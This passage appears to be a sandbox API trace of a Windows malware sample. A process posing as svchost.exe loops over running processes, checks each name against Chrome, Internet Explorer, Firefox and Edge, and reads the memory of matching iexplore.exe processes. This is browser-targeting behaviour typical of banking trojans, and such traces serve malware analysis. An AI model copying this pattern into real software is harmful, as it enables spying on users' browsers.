	[0223.384] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0223.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x56e0
	[0223.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.385] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0223.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.385] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.386] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0223.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.386] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.386] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0223.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x56e4
	[0223.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.387] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0223.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.387] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.388] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0223.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.388] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.389] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0223.389] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x56e8
	[0223.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.390] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0223.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.390] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.390] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0223.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.390] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0223.391] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x56ec
	[0223.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.391] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0223.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.392] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.392] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0223.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.393] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.394] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0223.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x56f0
	[0223.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.394] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0223.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.395] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.395] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0223.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.396] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.396] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0223.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x56f4
	[0223.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.397] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0223.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.398] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.398] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0223.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.399] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.399] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0223.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x56f8
	[0223.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.400] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0223.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.400] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.400] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0223.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.400] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0223.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x56fc
	[0223.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.402] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0223.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.402] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.403] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0223.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.404] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.404] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0223.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5700
	[0223.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.405] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0223.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.405] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.406] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0223.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.406] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.412] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0223.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5704
	[0223.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.412] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0223.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.413] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.413] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0223.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.414] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.414] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0223.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5708
	[0223.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.415] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0223.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.416] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.416] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0223.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.417] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.417] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0223.418] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x570c
	[0223.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.418] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0223.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.419] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.419] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0223.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.420] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0223.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5710
	[0223.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.421] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0223.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.421] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0223.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.421] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0223.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.422] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.422] NtQueryInformationProcess (in: ProcessHandle=0x5710, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0223.422] ReadProcessMemory (in: hProcess=0x5710, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0223.422] ReadProcessMemory (in: hProcess=0x5710, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0223.422] ReadProcessMemory (in: hProcess=0x5710, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0223.422] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0223.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0223.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5714
	[0223.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.423] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0223.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.423] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0223.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.424] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0223.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.425] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.425] NtQueryInformationProcess (in: ProcessHandle=0x5714, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0223.425] ReadProcessMemory (in: hProcess=0x5714, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0223.425] ReadProcessMemory (in: hProcess=0x5714, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0223.425] ReadProcessMemory (in: hProcess=0x5714, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0223.425] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0223.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0223.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5718
	[0223.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.426] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0223.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.426] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.427] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0223.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.427] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.427] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0223.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x571c
	[0223.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.428] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0223.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.428] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.429] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0223.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.429] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.429] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5720
	[0223.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.430] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.430] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.431] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.431] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.431] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.432] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5724
	[0223.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.433] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.433] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.433] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.434] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.434] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5728
	[0223.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.435] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.435] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.435] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.436] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.436] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0223.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x572c
	[0223.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.437] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0223.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.437] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.437] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0223.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.438] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.438] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0223.438] CloseHandle (hObject=0x4fd0) returned 1
	[0223.439] Sleep (dwMilliseconds=0x64) 
	[0223.535] GetCurrentProcessId () returned 0x110
	[0223.535] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0223.540] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0223.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0223.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0223.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5730
	[0223.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.546] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.546] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.546] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.546] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.547] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0223.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5734
